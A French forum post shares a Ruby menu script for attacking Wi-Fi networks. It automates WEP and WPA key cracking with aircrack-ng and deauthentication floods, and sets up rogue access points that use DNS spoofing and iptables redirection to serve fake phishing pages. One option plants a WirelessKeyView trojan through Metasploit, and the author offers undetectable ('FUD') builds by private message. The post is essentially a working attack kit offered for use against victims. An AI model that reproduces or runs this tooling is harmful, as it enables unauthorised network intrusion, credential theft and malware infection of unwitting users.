Avant d'utiliser le code qui va suivre vous devez disposer des paquets suivants:
ruby
rubygems1.8
rubygems1.9.1
libgtk2-ruby1.8
Je vous fais installer libgtk2-ruby1.8 et la 1.9.1 aussi car ma version de ruby est la 1.8.7, ça peu éviter des bugs et ça servira pour la V2 du tool.Pour les débutants dans le monde linux l'installe de ces paquets se fait dans le Gestionnaire de paquet synaptic
Donnez des droit aux Fakes pages et aussi aux images que j'ai pompé par ci par la, le lien ci-dessous contient les fakes pages et un wirelesskeyview non FUD (pour le FUD c'est en MP que ça se passe)
http://www.megaupload.com/?d=RE4PSVCY
Le code maintenant:
Enjoy
ruby
rubygems1.8
rubygems1.9.1
libgtk2-ruby1.8
Je vous fais installer libgtk2-ruby1.8 et la 1.9.1 aussi car ma version de ruby est la 1.8.7, ça peu éviter des bugs et ça servira pour la V2 du tool.Pour les débutants dans le monde linux l'installe de ces paquets se fait dans le Gestionnaire de paquet synaptic
Donnez des droit aux Fakes pages et aussi aux images que j'ai pompé par ci par la, le lien ci-dessous contient les fakes pages et un wirelesskeyview non FUD (pour le FUD c'est en MP que ça se passe)
http://www.megaupload.com/?d=RE4PSVCY
Le code maintenant:
Code:
#!/usr/bin/env ruby def menu puts "################## Coded By Flow (Koala) #######" puts "################## Pour crack-wifi.com #######" puts " ######################### " puts " ############# " puts " ##### " puts " # " puts "~~~~~~~~~~~~~~~~~~ 0 -Installation des elements ~~~~" puts "~~~~~~~~~~~~~~~~~~ 1 -Crack de cle wep avec injection ~~~~" puts "~~~~~~~~~~~~~~~~~~ 2 -Crack de cle wep avec -p0841 ~~~~" puts "~~~~~~~~~~~~~~~~~~ 3 -Crack de cle wpa avec dico ~~~~" puts "~~~~~~~~~~~~~~~~~~ 4 -Crack wpa avec rogue AP et fakepage ~~~~" puts "~~~~~~~~~~~~~~~~~~ 5 -Crack wpa avec rogue AP et WKV ~~~~" puts "~~~~~~~~~~~~~~~~~~ 6 -Boite a outils ~~~~" end menu opt="" while (opt!="0" && opt!="1" && opt!="2" && opt!="3" && opt!="4" && opt!="5" && opt!="6") puts "Choissisez votre options (entre 0 et 6)" opt=gets.chomp end if(opt=="0") puts "L'installation des elements utiles a la rogue va commencer, merci de patienter et de ne pas interrompre le processus, restez vigilent il se peut qu'on vous demande une confirmation pour l'installation des nouveaux paquets, si c'est le cas tapez Y pour Yes ou O pour Oui" sleep 10 system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e apt-get install dsniff &> /dev/null &") sleep 60 system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e apt-get install wireshark &> /dev/null &") sleep 90 system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo apt-get install dhcp3-server &> /dev/null &") sleep 90 system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo apt-get install apache2 &> /dev/null &") sleep 150 system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e apt-get install libapache2-mod-php5 &> /dev/null &") `sudo a2enmod php5` `sudo service apache2 restart` end menu if(opt=="1") puts "Repondez aux demandes du programme, faites attention a ne pas vous tromper" sleep 5 `airmon-ng start wlan0` system ("ifconfig") puts "Rentrez l'adresse mac de votre carte wifi" mac="" mac=gets.chomp $mac=mac puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer" sleep 5 system ("airodump-ng --encrypt wep mon0") puts "Rentrez un nom pour le fichier de capture" nom="" nom=gets.chomp $nom=nom puts "Rentrez le nom du reseau (ESSID)" essid="" essid=gets.chomp $essid=essid puts "Rentrez le canal du reseau (CH)" ch="" ch=gets.chomp $ch=ch puts "Rentrez l'adresse du reseau (BSSID)" bssid="" bssid=gets.chomp $bssid=bssid system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nom} -c #{$ch} --bssid #{$bssid} mon0 &> /dev/null &") sleep 3 system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -1 30 -e #{$essid} -a #{$bssid} -h #{$mac} mon0 &> /dev/null &") sleep 5 system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -3 -e #{$essid} -a #{$bssid} -h #{$mac} -x 500 mon0 &> /dev/null &") sleep 1800 system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng #{$nom}-01.cap &> /dev/null &") end if(opt=="2") puts "Repondez aux demandes du programme, faites attention a ne pas vous tromper" sleep 5 system ("ifconfig") puts "Rentrez l'adresse mac de votre carte wifi" mac="" mac=gets.chomp $mac=mac puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer" sleep 5 system ("airodump-ng --encrypt wep mon0") puts "Rentrez un nom pour le fichier de capture" nom="" nom=gets.chomp $nom=nom puts "Rentrez le nom du reseau (ESSID)" essid="" essid=gets.chomp $essid=essid puts "Rentrez le canal du reseau (CH)" ch="" ch=gets.chomp $ch=ch puts "Rentrez l'adresse du reseau (BSSID)" bssid="" bssid=gets.chomp $bssid=bssid system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nom} -c #{$ch} --bssid #{$bssid} mon0 &> /dev/null &") sleep 3 system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -1 30 -e #{$essid} -a #{$bssid} -h #{$mac} mon0 &> /dev/null &") sleep 5 system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b #{$bssid} -h #{$mac} mon0 &> /dev/null &") sleep 1800 system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -P 1 #{$nom}-01.cap &> /dev/null &") end if(opt=="3") puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer" sleep 5 system ("airodump-ng --encrypt wpa mon0") puts "Rentrez un nom pour le fichier de capture" nom="" nom=gets.chomp $nom=nom puts "Rentrez le nom du reseau (ESSID)" essid="" essid=gets.chomp $essid=essid puts "Rentrez le canal du reseau (CH)" ch="" ch=gets.chomp $ch=ch puts "Rentrez l'adresse du reseau (BSSID)" bssid="" bssid=gets.chomp $bssid=bssid puts "Rentrez l'adresse de la personne connecte au reseau (STATION)" station="" station=gets.chomp $station=station system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nom} -c #{$ch} --bssid #{$bssid} mon0 &> /dev/null &") sleep 3 system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -0 20 -a #{$bssid} -c #{$station} mon0 &> /dev/null &") sleep 18 rep="" while rep!="oui" && rep!="non" puts "Le hanshake est-il capture? oui/non" rep=gets.chomp if rep=="oui" puts "Entrez le nom du dico a utiliser" dico="" dico=gets.chomp $dico=dico system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -w #{$dico} #{$nom}.cap &> /dev/null &") elsif rep=="non" puts "Lancement de mdk3" sleep 3 system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e mdk3 mon0 a -a #{$bssid} &> /dev/null &") sleep 40 puts "Maintenant entrez le nom du dico a utiliser" dico="" dico=gets.chomp $dico=dico system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -w #{$dico} #{$nom}.cap &> /dev/null &") else puts "Choisissez une reponse valide" end end end if(opt=="4") puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer" sleep 5 system ("airodump-ng --encrypt wpa mon0") puts "Rentrez le nom du reseau (ESSID)" essid="" essid=gets.chomp $essid=essid puts "Rentrez le canal du reseau (CH)" ch="" ch=gets.chomp $ch=ch puts "Rentrez l'adresse du reseau (BSSID)" bssid="" bssid=gets.chomp $bssid=bssid puts "Creation de la rogue AP" sleep 3 system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -e #{$essid} mon0 &> /dev/null &") sleep 3 `ifconfig at0 up` `ifconfig at0 10.0.0.1 netmask 255.255.255.0` `ifconfig at0 mtu 1400` `echo > dhcpd.leases` `iptables --flush` `iptables --table nat --flush` `iptables --delete-chain` `iptables --table nat --delete-chain` `route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 &> /dev/null` `iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 10.0.0.1` `iptables -P FORWARD ACCEPT` `iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1:80` puts "Regles iptables effectues, redemarrage de dhcp3" sleep 3 system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e /etc/init.d/dhcp3-server restart &> /dev/null &") puts "Mise en place de apache et dnsspoof" sleep 3 system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo service apache2 restart &> /dev/null &") sleep 3 system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e dnsspoof -i at0 -f /root/dns.txt &> /dev/null &") puts "lancement de wireshark" sleep 3 system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e wireshark &> /dev/null &") sleep 5 down="" while down!="oui" && down!="non" puts "Pour downgrader le reseau cible utiliser mdk3 ou airbase? le resultat est le meme mais mdk3 va tenter de deconnecter la personne du reseau tandis qu'un second airbase va creer un reseau identique au reseau reel en lui prenant ses propres parametres de façon a ce qu'il ne puisse plus se connecter.Une croix rouge est cense s'afficher dans sa barre de reseau sans fil, vous ne pouvez lancer qu'un des 2 a la fois que choisissez vous? mdk3/airbase" down=gets.chomp if down=="mdk3" system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e mdk3 mon0 a -a #{$bssid}") elsif down=="airbase" system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -c #{$ch} -e #{$essid} -a #{$bssid} -I 600 -0 mon0 &> /dev/nul &") puts "Revenir au menu?" rp=gets.chomp else puts "Choisissez une reponse valide" end end end if(opt=="5") puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer" sleep 5 system ("airodump-ng --encrypt wpa mon0") puts "Rentrez le nom du reseau (ESSID)" essid="" essid=gets.chomp $essid=essid puts "Rentrez le canal du reseau (CH)" ch="" ch=gets.chomp $ch=ch puts "Rentrez l'adresse du reseau (BSSID)" bssid="" bssid=gets.chomp $bssid=bssid puts "Creation de la rogue AP" sleep 3 system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -e #{$essid} mon0 &> /dev/null &") sleep 3 `ifconfig at0 up` `ifconfig at0 10.0.0.1 netmask 255.255.255.0` `ifconfig at0 mtu 1400` `echo > dhcpd.leases` `iptables --flush` `iptables --table nat --flush` `iptables --delete-chain` `iptables --table nat --delete-chain` `route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 &> /dev/null` `iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 10.0.0.1` `iptables -P FORWARD ACCEPT` `iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1:80` puts "Regles iptables effectues, redemarrage de dhcp3" sleep 3 system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e /etc/init.d/dhcp3-server restart &> /dev/null &") puts "Mise en place de apache et dnsspoof" sleep 3 system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo service apache2 restart &> /dev/null &") sleep 3 system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e dnsspoof -i at0 -f /root/dns.txt &> /dev/null &") puts "Mise en place du trojan" sleep 3 `cp -f /root/flowpa/WirelessKeyView.exe /tmp/WirelessKeyView.exe` Dir.chdir '/root/metasploit' `cd /root/metasploit` sleep 3 system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e ./msfconsole -r /root/flowpa/flowpa.rc &> /dev/null &") sleep 5 down="" while down!="oui" && down!="non" puts "Pour downgrader le reseau cible utiliser mdk3 ou airbase? le resultat est le meme mais mdk3 va tenter de deconnecter la personne du reseau tandis qu'un second airbase va creer un reseau identique au reseau reel en lui prenant ses propres parametres de façon a ce qu'il ne puisse plus se connecter.Une croix rouge est cense s'afficher dans sa barre de reseau sans fil, vous ne pouvez lancer qu'un des 2 a la fois que choisissez vous? mdk3/airbase" down=gets.chomp if down=="mdk3" system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e mdk3 mon0 a -a #{$bssid}") elsif down=="airbase" system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -c #{$ch} -e #{$essid} -a #{$bssid} -I 600 -0 mon0 &> /dev/nul &") else puts "Choisissez une reponse valide" end end end if(opt=="6") puts "1 -Editer les fichiers essentiels au crack" puts "2 -Editer les fichiers log de apache" puts "3 -Faire une rogue AP transparente pour permettre a la victime de naviguer sur le net" puts "4 -Lister les fichiers et leurs droits respectif dans /var/www" choix="" while choix!="1" && choix!="2" && choix!="3" choix=gets.chomp if choix=="1" `gedit /etc/dhcp3/dhcpd.conf` `gedit /root/dns.txt` elsif choix=="2" `gedit /var/log/apache2/access.log` `gedit /var/log/apache2/error.log` elsif choix=="3" puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer" sleep 5 system ("airodump-ng --encrypt wpa mon0") puts "Rentrez le nom du reseau (ESSID)" essid="" essid=gets.chomp $essid=essid puts "Rentrez le canal du reseau (CH)" ch="" ch=gets.chomp $ch=ch puts "Rentrez l'adresse du reseau (BSSID)" bssid="" bssid=gets.chomp $bssid=bssid puts "Creation de la rogue AP" sleep 3 system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -e #{$essid} mon0 &> /dev/null &") sleep 3 `ifconfig at0 up` `ifconfig at0 10.0.0.1 netmask 255.255.255.0` `ifconfig at0 mtu 1400` `echo > dhcpd.leases` `iptables --flush` `iptables --table nat --flush` `iptables --delete-chain` `iptables --table nat --delete-chain` `iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE` `iptables --append FORWARD --in-interface at0 -j ACCEPT` `iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1` puts "Regles iptables effectues, redemarrage de dhcp3" sleep 3 system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e /etc/init.d/dhcp3-server restart &> /dev/null &") puts "La victime peut surfer sur internet maintenant, soyez pas trop mechant :)" sleep 5 elsif choix=="4" puts "Les fichiers present sont:" sleep 3 system ("ls -l /var/www") end end end system ("ruby Securethis.rb")
Enjoy
Commentaire